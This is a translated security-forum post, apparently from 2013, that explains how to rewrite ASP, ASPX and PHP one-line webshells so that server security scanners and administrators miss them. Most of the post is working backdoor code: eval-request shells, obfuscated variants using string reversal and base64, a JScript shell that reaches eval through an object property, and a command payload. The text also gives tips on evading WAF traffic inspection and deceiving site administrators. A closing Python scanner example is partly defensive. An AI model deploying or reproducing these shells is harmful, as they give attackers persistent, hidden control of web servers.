RedFree, 2013/12/30 12:04

0x00 Background


Server-side security software that scans web files for malicious code is very common by now; typical products are D Shield (D盾), SafeDog (安全狗), Huweishen (护卫神) and 360 Website Guard (360网站卫士). Their feature sets are roughly the same, for example:

1. SQL injection checks
2. XSS checks
3. Dangerous code in website files
4. Database permission management and risky-behaviour checks
5. Traffic monitoring
6. Website log management
7. System process management
8. Port state viewing
9. System accounts and files in special locations
10. DDoS / CC attack defence
...

These functions can be categorized as follows:

security software
  +-- before compromise
  |     +-- inspect GET content
  |     +-- inspect POST content
  |     +-- HTTP request headers, request frequency, etc.
  +-- after compromise
        +-- log review and analysis
        +-- backdoor detection and removal
        +-- system hardening

This article targets one situation: using a one-line webshell (一句话木马; not a full-featured "big horse" shell, because a big shell is far more likely to be flagged) to execute arbitrary code on a site protected by website security software, without that software detecting it.

0x01 Technical details


For a one-liner to receive code, execute it and return the result, the first requirement is that the one-liner itself survives the scan. Enough talk, let's get to work!

Tools used:

D盾_Web查杀 (the D Shield web scanner)

Plain, unmodified ASP, ASPX and PHP one-liners:

```
<%eval request("z")%>
<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>
<?php @eval($_POST['z']); ?>
```

Let's see how D Shield rates the stock one-liners.

Level 5 (eval backdoor) on all three! That means even if your one-liner is already sitting in the target site's directory, the WAF will cut the connection the moment you visit it. Such a one-liner is useless on its own, never mind as a working tool.

So what do you do in this case? My answer: the same thing as making an EXE undetectable on Windows: find the signature the scanner keys on, then change it or bypass it. Of course, an undetectable shell is much easier than an undetectable EXE...

Let's start making our one-liner undetectable. First, understand how a one-line Trojan works. Compare the ASP, ASPX and PHP one-liners. What do you notice?

The one-liners in the three languages have almost identical structure: read client data from the request, then execute that data. The source of the data can be POST, GET, cookies, session and so on (mostly POST or GET); taking data length, encoding, concealment and other factors into account, POST is the best choice.

So what exactly does the server security software match on? Since we are talking about "signatures", let's run the following test:

I inserted a random character into Request/POST and scanned again. Evidently the scanner does not key on eval (execute/executeglobal/assert...) by itself but on eval plus "request data" together. A bare eval in a script only produces a reminder-level warning (if a function could never be used, why would it exist?). Of course, none of the three scripts in the figure above can execute any more, because there is no such thing as "srequest"!

Does that leave us with nothing? No! We can build a loop like this: [exec decode(encoded)] (pseudo-code), where "encoded" is the original one-liner after encoding. The encode and decode functions you write yourself...

After some tinkering I modified the shell code to the following (none of them is optimal, because I'm a bit lazy):

ASP:

```asp
<%
' Decoder: reverse the string, then turn "/*/" back into a double quote
' and "\*\" into a line break. The literal below decodes to: eval request("z")
Function MorfiCoder(Code)
    MorfiCoder = Replace(Replace(StrReverse(Code), "/*/", """"), "\*\", vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>
```

ASPX:

```aspx
<script runat="server" language="Jscript">
// "unsafe" is assembled from fragments so the literal never appears in the file;
// eval(str, "unsafe") is JScript.NET's unrestricted eval
function popup(str) {
    var q = "u";
    var w = "afe";
    var a = q + "ns" + w;
    var b = eval(str, a);
    return (b);
}
</script>
<%
// The base64 literal decodes to Request.Item["z"]; the inner popup() resolves it to
// the posted code, the outer popup() executes that code
popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));
%>
```

PHP

```php
<?php
$mujj = $_POST['z'];
if ($mujj != "") {
    // z0 carries base64-encoded PHP; it is spliced into an assignment and then eval'd
    $xsser = base64_decode($_POST['z0']);
    @eval("\$safedg = $xsser;");
}
?>
```
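As an added example that is not part of the original post: a small Python scanner that reproduces the behaviour the earlier test inferred (the signature is eval plus request data; eval on its own only rates a reminder), runs it over the stock and rewritten shells quoted above, and then shows how a scanner claws two of the three back by emulating the shells' own decoders (StrReverse/Replace for the ASP one, base64 for the ASPX one). The regexes and the severity names are this example's assumptions, not D Shield's actual rules; the shell samples are the ones shown on this page, collapsed onto single lines.

```python
"""Added example, not code from the original post.

Reproduces the scanner behaviour the post infers (the signature is an exec
primitive fed directly by client input; the primitive alone is only a
reminder), shows that the rewritten shells quoted in the post slip past that
rule on the raw text, and shows how a scanner gets two of them back by
emulating the shells' own decoding. The regexes are this example's
assumptions; they are not the real rules of D盾 or any other product.
"""
import base64
import re

# Stock one-liners quoted in the post.
STOCK = {
    "asp":  '<%eval request("z")%>',
    "aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>',
    "php":  "<?php @eval($_POST['z']); ?>",
}

# Rewritten shells quoted in the post, collapsed onto one line each.
REWRITTEN = {
    "asp":  '<% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),'
            '"/*/",""""),"\\*\\",vbCrlf) End Function '
            'Execute MorfiCoder(")/*/z/*/(tseuqer lave") %>',
    "aspx": '<script runat="server" language="Jscript">function popup(str){'
            'var q="u";var w="afe";var a=q+"ns"+w;return eval(str,a);}</script>'
            '<% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString('
            'System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); %>',
    "php":  '<?php $x=$_POST[\'z\']; @eval("\\$safedg = $x;"); ?>',
}

EXEC_PRIM = r'(?:eval|execute|executeglobal|assert)'
CLIENT_INPUT = r'(?:request|\$_(?:post|get|request|cookie))'

# Assumed "level 5" rule: an exec primitive whose argument starts with client input.
EVAL_REQUEST = re.compile(rf'\b{EXEC_PRIM}\b\s*\(?\s*{CLIENT_INPUT}', re.I)
# Assumed "reminder" rule: the primitive appears at all.
BARE_EXEC = re.compile(rf'\b{EXEC_PRIM}\b', re.I)


def level(source: str) -> str:
    """Rate raw file text as 'backdoor', 'reminder' or 'clean'."""
    if EVAL_REQUEST.search(source):
        return "backdoor"
    if BARE_EXEC.search(source):
        return "reminder"
    return "clean"


def morfi_decode(encoded: str) -> str:
    """Emulate the ASP shell's MorfiCoder: StrReverse, then /*/ -> quote, \\*\\ -> CRLF."""
    return encoded[::-1].replace("/*/", '"').replace("\\*\\", "\r\n")


def base64_literals(source: str) -> list:
    """Decode every quoted literal that is valid base64 and decodes to UTF-8 text."""
    found = []
    for m in re.finditer(r'"([A-Za-z0-9+/]{8,}={0,2})"', source):
        try:
            found.append(base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            pass
    return found


def recovered_text(source: str) -> list:
    """Everything the two emulated decoders turn back into plaintext."""
    out = [morfi_decode(m.group(1))
           for m in re.finditer(r'MorfiCoder\("([^"]*)"\)', source)]
    return out + base64_literals(source)


def level_after_decode(source: str) -> str:
    """Re-rate after decoding. Recovered text is scanned as if it sat in the file;
    a recovered literal that names client input next to any exec primitive in the
    file also counts as the pair (the ASPX wrapper hides the call itself)."""
    recovered = recovered_text(source)
    if EVAL_REQUEST.search(source + "\n" + "\n".join(recovered)):
        return "backdoor"
    if BARE_EXEC.search(source) and any(re.search(CLIENT_INPUT, r, re.I) for r in recovered):
        return "backdoor"
    return level(source)


if __name__ == "__main__":
    samples = {**{"stock-" + k: v for k, v in STOCK.items()},
               **{"rewritten-" + k: v for k, v in REWRITTEN.items()}}
    for name, src in samples.items():
        print(f"{name:16s} raw={level(src):9s} decoded={level_after_decode(src)}")
```

On the raw text all three rewritten shells rate only "reminder", the level the post says an administrator learns to ignore. The ASP and ASPX variants come back as "backdoor" once their decoders are emulated; the PHP variant hides nothing and merely routes $_POST through a variable, so it stays at "reminder": catching it needs data-flow tracking rather than decoding, which is exactly the gap the post relies on.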

The effect is as follows:

At this point the shell connection is in fact no longer cut, and all three one-liners above support a connection from our beloved Chopper (中国菜刀). But in practice you still can't connect with Chopper, because the security software also inspects GET, POST, cookies... and there are too many keywords (execute, Response.write, base64_decode... capture the traffic and see for yourself). How do we break through this? Two ways:

1. Modify Chopper itself by disassembling it (still has signatures), see: zone.wooyun.org/content/816... 2. Write your own Chopper (can be completely signature-free), see: zone.wooyun.org/content/813...

Chopper (client), custom encoding ===> send ===> one-liner (server): decode, execute, return (encoded) data

Now you can use Chopper to manage sites that run web security software, but the scanner will still flag Execute/eval/base64_decode as encryption or obfuscation. Under normal circumstances eval/execute/executeglobal... are rarely used (an experienced admin searches for eval, execute, assert and so on and deletes whatever contains them inside <% %>). How do we trick the administrator into keeping our shell? There are answers, of course: you can build an injection or file upload and then use your own shell, but my goal is to make my one-liner as inconspicuous as possible (SafeDog, Huweishen, D Shield and 360 Website Guard don't flag it, and the administrator doesn't recognise it as a one-liner).

At this point there may be a hard decision to make: abandon Chopper and write the client entirely yourself. All the key code such as eval goes inside the <script runat=server> tag, because security software is lax about code inside that tag, whereas code inside <% %>, <?php ?> and similar script delimiters gets much stricter regex scrutiny. Tricks that used to be perfect for evasion are no longer available, but we still have JScript! Who pays attention to LANGUAGE=JAVASCRIPT?

After some modification, the final code is as follows:

```asp
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>
var P = Request.form('z');
var Wab = {'E' : eval};   // eval reached through an object property, never called by name
Wab.E(P + '');
</SCRIPT>
```

Take a look at the effect…

D Shield no longer shows any hint at all! So how do you use this one-liner? I already said Chopper can't connect to it. Well, try POSTing a piece of code to it from Firefox...

Of course it isn't limited to printing the site path: arbitrary code! Try:

```javascript
// Server-side JScript, posted as parameter z: site path plus the drive list,
// wrapped in Chopper's "->|" ... "|<-" delimiters
try {
    var S = "->|" + Server.Mappath("/") + "\t";
    var oFso = Server.CreateObject("Scripting.FileSystemObject");
    var oDrivers = oFso.Drives;
    for (var x = new Enumerator(oDrivers); !x.atEnd(); x.moveNext()) {
        var oDriver = x.item();
        S += oDriver.Path;
    }
    S += "|<-";
    Response.write(S);
} catch (e) {}
```

This one-liner does everything we need, but you could say it is still not perfect because it doesn't support Chopper! Fine, let's remodel it... The modified shell code:

```asp
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>
var Sp = Request.form('z');       // the client only sends a selector, never code
var Fla = {'E' : eval};
var St = "";
var A = "";                        // code for action A (elided here)
var B = "XX code";                 // code for action B
var C = "XXXXXX";
...
switch (Sp) {
    case "A": St = A; break;
    case "B": St = B; break;
    case "C": St = C; break;
    case "D": St = D; break;
    case "E": St = E; break;
    ...
    default:
}
Fla.E(St + '');
</SCRIPT>
```

This makes the Chopper connection possible (I have omitted code to keep the key points clear; the above is only an example).

Well, that's enough fun with the ASP one-liner; next, ASPX and PHP. Honestly, I don't know .NET programming or PHP programming. At best I'm an uncertified amateur programmer, so from here on take what you find useful and don't ridicule too hard!!!

In general the ASPX one-liner above is enough, but if you are a perfectionist you can compile your code into a DLL and drop it into the bin directory (lake2 did this years ago with WebAdmin 2.Y, see blog.csdn.net/lake2/artic...). The code in a DLL can be seen even with Notepad, never mind by a scanner...

Finally, PHP: the transformation approach is the same as for ASP and ASPX. You can put the code inside a <script language="php"> tag for extra confusion, but security software has long since caught on to this trick, just as with ASP VBScript, so I won't dwell on it; choose according to the actual situation and where the shell will live.

Simple variable passing is enough (PHP syntax is so flexible that no encoding step is even needed)... I use the following code as my one-liner:

```php
<?php
$x = $_POST['z'];
// the posted value is spliced into an assignment, so eval's argument is never the request itself
@eval("\$safedg = $x;");
?>
```

Of course, if you are still not satisfied you can keep going and get rid of eval itself! Use preg_replace, array_map, or fetch eval/assert out of the REQUEST variable... Without a direct eval, D Shield gives reports of varying severity (suspicious but not identified; after all, these uncommon functions are fairly risky...). I couldn't be bothered to go further... see the effect:

That is about all I have to write on playing with one-liners (because of my level, the ASPX and PHP parts aren't as detailed; maybe later...). If one day one-liners stop working because a keyword gets matched (which is unlikely), write custom scripts that can at least read and write files and connect to databases.

References:

qqhack8.blog.163.com/blog/static...

hi.baidu.com/monyer/item...